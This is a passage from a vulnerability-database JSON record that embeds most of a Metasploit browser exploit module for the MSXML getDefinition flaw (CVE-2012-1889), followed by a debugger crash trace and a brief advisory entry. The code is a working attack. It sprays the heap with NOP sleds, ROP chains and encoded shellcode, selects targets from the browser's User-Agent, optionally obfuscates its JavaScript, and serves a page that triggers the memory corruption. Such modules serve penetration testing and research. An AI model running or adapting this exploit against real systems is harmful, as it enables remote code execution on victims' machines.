unescape(\"#{js_code}\");\n var #{randnop2} = \"#{js_90_nops}\";\n var nops_90 = unescape(#{randnop2});\n\n while (nops_90.length < 0x80000) nops_90 += nops_90;\n\n var offset_length = #{t['RopChainOffset']};\n\n for (var i=0; i < 0x1000; i++) {\n var padding = unescape(tounescape(randomblock(0x1000)));\n while (padding.length < 0x1000) padding+= padding;\n var junk_offset = padding.substring(0, offset_length - code.length);\n var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\n heap_obj.alloc(sprayblock);\n }\n\n JS\n\n return spray\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n p = payload.encoded\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\n js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n\n\n if not my_target['Rop'].nil?\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\n end\n\n if my_target['RandomHeap']\n js = get_random_spray(my_target, js_rop, js_code, js_90_nops)\n elsif not my_target['Rop'].nil?\n js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)\n else\n js = get_easy_spray(my_target, js_code, js_nops)\n end\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n object_id = rand_text_alpha(4)\n\n html = <<-EOS\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\n <script>\n var obj = document.getElementById('#{object_id}').object;\n var src = unescape(\"%u0c08%u0c0c\");\n while (src.length < 0x1002) src += src;\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\n src = src.substr(0, 0x1000 - 10);\n var pic = document.createElement(\"img\");\n pic.src = src;\n pic.nameProp;\n obj.definition(#{rand(999) + 1});\n </script>\n </body>\n </html>\n EOS\n\n html = html.gsub(/^ {4}/, '')\n\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n\n end\nend\n\n=begin\n(e34.358): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350\neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????\n\n\n0:008> r\neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\n0:008> k\nChildEBP RetAddr\n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\n020bf590 633a77ff jscript!VAR::InvokeByName+0x135\n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\n020bf958 633891f1 jscript!CSession::Execute+0x175\n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/msxml_get_definition_code_exec.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-0175", "CVE-2012-1891", "CVE-2012-1890", "CVE-2012-1889", "CVE-2012-1893", "CVE-2012-1870"], "description": "Microsoft XML Services memory corruption, ADO memory corruption, kernel drivers vulnerabilities, Window Shell command injection, TLS vulnerabilities", "edition": 1, "modified": "2012-08-26T00:00:00", "published": "2012-08-26T00:00:00", "id": "SECURITYVULNS:VULN:12464", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12464", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}